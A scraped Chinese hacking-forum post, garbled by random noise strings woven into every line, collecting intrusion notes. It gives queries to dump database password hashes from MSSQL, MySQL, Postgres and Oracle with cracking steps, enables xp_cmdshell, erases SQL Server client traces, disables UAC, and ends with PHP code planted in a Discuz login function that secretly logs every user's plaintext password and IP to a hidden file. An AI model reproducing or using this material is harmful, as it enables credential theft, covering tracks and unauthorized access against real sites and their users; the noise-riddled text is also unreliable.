2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
l7 G( F/ z2 h |' U6 B
4 ?# P9 i: A: `+ n0×0100- constant header
" Q8 D( r! x C$ ~34767D5C- salt. W) y8 L7 a# J. c% Q1 g/ [
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
: D+ {8 s! E- J+ j) d- h) ]2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
; M/ h% y+ T) C3 s' o6 K2 _crack the upper case hash in ‘cain and abel’ and then work the case sentive hash* Y% U8 ?; x4 A/ [0 ?
SQL server 2005:-5 U5 K5 t# H, }7 }2 H- B
SELECT password_hash FROM sys.sql_logins where name='sa'
3 j: [- T" A& V0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F) t9 m* V9 v9 D2 E/ {! K7 _, L, H
0×0100- constant header
* J/ g! J! e$ Y) w# f1 E/ a. z993BF231-salt6 R+ I5 ?! k; M) f) f4 h
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash$ T4 y x9 a9 u. t. S- A
crack case sensitive hash in cain, try brute force and dictionary based attacks.
3 N( @: Y9 d; R: ~& J" ^- g
% s1 d9 q6 J& U% m bupdate:- following bernardo’s comments:-0 a; ]& B% |9 C
use function fn_varbintohexstr() to cast password in a hex string.
u( X& S: C. V- z9 pe.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins+ D/ R6 a+ s2 A$ h+ X7 X, s
4 w! d+ J; s0 rMYSQL:-
6 ~- [- j% z5 `' o' ?" k) k' l+ j* [ a7 G( l1 {; x) y
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.9 j2 }" q. d8 i$ N* \
4 M, h( E$ x; O& Z( e- \
*mysql < 4.13 ]/ \- d! l5 }2 U; {1 W; J$ u
* `. ?; u( R/ T+ h0 @2 @3 M
mysql> SELECT PASSWORD(‘mypass’);0 W p7 y \) Q( \' u9 z/ M
+——————–+. n t7 E9 s: t* n. u4 n; X
| PASSWORD(‘mypass’) |; P) @2 T7 i( a% i6 j" K- \
+——————–+8 w3 A! ^! a+ Y1 J) D- ?) [
| 6f8c114b58f2ce9e |
- }/ p5 J7 F3 ^5 ]" W# S+——————–+
1 s) Z7 X# p, n* Y3 \7 M) ^* `& I7 i0 h/ c7 }
*mysql >=4.1
$ e% e: N ]4 f! X' j3 e$ K6 x9 ?. t# A" U. _! a8 }. b" q/ [
mysql> SELECT PASSWORD(‘mypass’);% T" F) O7 t6 Z3 d2 _! z& _
+——————————————-+
1 `1 h$ T& e; j; w| PASSWORD(‘mypass’) |" k: @$ J( j" g& ]& w
+——————————————-+
, G3 g& |/ f+ h; y2 m, _7 o1 f| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 | v% U$ s/ t# L) ^) r9 R
+——————————————-+% u4 _3 C+ L0 ?7 Y+ H$ t* l2 y
6 _0 O5 C+ X4 JSelect user, password from mysql.user; G9 X, @- e7 G( M
The hashes can be cracked in ‘cain and abel’
8 i' I7 c3 t& C; n& c% V
$ S5 s5 Y4 b, v: H% s$ ePostgres:- ?8 [/ P m7 v' f
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
+ O- G! }& F! E) [- p8 `8 Mselect usename, passwd from pg_shadow;9 ^5 V$ L7 E3 M5 L
usename | passwd; R- v+ m. s- \! `/ G( H$ p/ @) N
——————+————————————-
+ `6 Y; D) a1 T: btestuser | md5fabb6d7172aadfda4753bf0507ed4396! f+ b- T; p) A6 v5 W7 h- e
use mdcrack to crack these hashes:-/ c0 [$ ~* H, b/ C+ J
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43964 H" \( E; V8 K5 l
( m: w+ K5 m+ |- z u! [1 m$ }
Oracle:-
, a( r+ w% s: ^# g9 V+ l9 Xselect name, password, spare4 from sys.user$
3 j$ u6 f( s2 ^! chashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
n" \/ _& M. ?& W8 R* L4 W+ W! eMore on Oracle later, i am a bit bored….1 Y" Z: K$ c& @6 n
: I* Y- B4 K* H% i2 F( Y# R" J) u: \# V' Z: I: f" v0 r
在sql server2005/2008中开启xp_cmdshell
* N* O' P, B5 Z-- To allow advanced options to be changed.7 m8 P$ i6 U( \4 H
EXEC sp_configure 'show advanced options', 1
# \ W# j/ h& t7 ]: YGO" H# l2 P, O* Z; o+ x' r
-- To update the currently configured value for advanced options.
+ t. W- e, R' H6 r4 c; S3 ?RECONFIGURE
9 u. B+ z0 G1 F1 {8 O; iGO
! F! }8 x; d- ^- E9 `-- To enable the feature.
: l3 U# W! R* W( E5 x# h8 @' Z3 eEXEC sp_configure 'xp_cmdshell', 1# y a" Z- f+ i7 O2 I) ?) Z
GO& x( |2 ~8 A, S, N' G6 k$ b2 v0 M
-- To update the currently configured value for this feature.* q9 X. i8 |! r$ u/ s8 \- O
RECONFIGURE& N8 ]0 \) b4 r [4 E' K
GO6 V9 U) _0 x5 O, q# L
SQL 2008 server日志清除,在清楚前一定要备份。
, Y# v8 {# k3 y) k如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:" ?3 s9 P+ R# c! _
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin/ G5 L$ d7 G d3 X$ k0 L
# T S* N; ^1 Y/ i; ?$ o: o) L2 A* A
对于SQL Server 2008以前的版本: B' l* @, z+ u* l& [! F
SQL Server 2005:
9 n( E5 M, D( l' d J U删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
- P9 \7 L3 U' u' R* Y: R- [. hSQL Server 2000:
. R2 u6 ~3 d3 a/ [3 F& {$ H! @清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
2 [# b6 N R/ y: _! a: E7 V' L z7 Q$ d$ H4 h4 K% r3 Q8 N
本帖最后由 simeon 于 2013-1-3 09:51 编辑8 l$ L+ A& ~# n( m% t0 b& `
8 ]2 j' j" q0 S( V G5 k; z( P" n; x
1 l. G# O7 `$ Ywindows 2008 文件权限修改+ g" U. O$ n' Y# p4 f
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
3 y+ p: L1 T# v) }1 s2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
* Y+ F0 j- x5 x2 D一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
6 m$ V" a1 P% E, j" X% M; n
+ P9 q! n; T0 P0 ~Windows Registry Editor Version 5.00" |5 @+ g F6 e# H# H+ m* q4 o
[HKEY_CLASSES_ROOT\*\shell\runas]; W7 S: F* T/ ?+ B) C* Z% ~( R
@="管理员取得所有权"
: t. z, a' q3 N* F L"NoWorkingDirectory"=""
% b$ }& d2 ^5 W7 @[HKEY_CLASSES_ROOT\*\shell\runas\command]( K& e8 s. D$ N
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& D B3 _8 n. v/ t/ P" p% H$ L/ T
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
$ J9 _; K9 q9 E' O[HKEY_CLASSES_ROOT\exefile\shell\runas2]% t5 N f7 I& n' v% q" u9 V
@="管理员取得所有权"1 I# e0 g/ O5 B6 I
"NoWorkingDirectory"=""# ]) }( p; K7 @5 J
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]- ~" F1 I) T! [$ T9 _
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
2 i% J: r( {1 I) _( W"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 C& q q( J. }. m: I0 h) C/ a9 b
2 A5 C7 }* i2 S2 q, f1 Z[HKEY_CLASSES_ROOT\Directory\shell\runas] b' E- s$ Z0 w2 e* B1 Q
@="管理员取得所有权"
6 O6 Z2 k' m2 W: i3 E: D"NoWorkingDirectory"=""
$ I. B9 {3 q1 X5 ~" p, u[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
$ ^9 l' L, q T1 {+ H' L4 X8 K@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
$ G! W" |$ k. `6 S9 Y& m"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
8 m. v% c$ C7 g$ F% w. z
1 |" t+ Y7 B0 Q0 {$ f+ S( e0 Z3 i0 n. C5 h) U8 g. l1 A$ G1 r9 c
win7右键“管理员取得所有权”.reg导入
' r$ M9 F5 T6 A* D7 B. ]. M二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,8 _4 P/ v; V7 ]& \- C/ a/ Z; v
1、C:\Windows这个路径的“notepad.exe”不需要替换
. B6 U6 R# p" d, l. U2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
8 f& ]6 v* @/ w# A5 V$ A: ^3、四个“notepad.exe.mui”不要管
+ G2 d6 y1 C+ [1 M& |0 v4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
4 P4 V2 o# ]# |) ^1 g+ U( v& oC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”, _9 ]& H( F: g/ f5 `
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
9 s+ L/ e9 l$ e4 U2 E' p% d' P. o替换完之后回到桌面,新建一个txt文档打开看看是不是变了。- T0 ]) p1 I% G9 H* w t5 Q, w0 J
windows 2008中关闭安全策略: ! @4 |" m0 ^8 }( x1 S
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
: r" g2 A: P# U s, e E6 b修改uc_client目录下的client.php 在7 ]! r3 E% x6 t! ~. ~
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
& b% {# Z2 M" ^3 x) @* [% U# _下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
" p* o; Y) y* q# M8 d- x你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw7 g j3 q! R; `, B( D$ ~! p
if(getenv('HTTP_CLIENT_IP')) {
8 w7 v1 U. v5 ^" `0 B# W7 P# t$onlineip = getenv('HTTP_CLIENT_IP');
% Q$ {$ p- ^" A6 R} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
w# F0 c3 w# W# i8 l$onlineip = getenv('HTTP_X_FORWARDED_FOR');
# ~5 Q* m, R% v2 z5 d" b# l, [8 Y1 s} elseif(getenv('REMOTE_ADDR')) {% A R* l j3 J3 c4 t/ Y/ W+ P t
$onlineip = getenv('REMOTE_ADDR');. R( }4 `& W2 \" `) e% b5 S
} else {
/ t# F, V: m) K9 K$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];' A; y, k+ E& O6 H0 N7 M3 ]
}
4 _8 P/ F; J4 x. ^9 h; E& }! [ $showtime=date("Y-m-d H:i:s");- N6 Q6 D4 b# J0 E; G7 X
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
6 G0 q0 _1 S' h0 q& P9 n& ] $handle=fopen('./data/cache/csslog.php','a+');4 X- P: E3 D( s1 C
$write=fwrite($handle,$record); |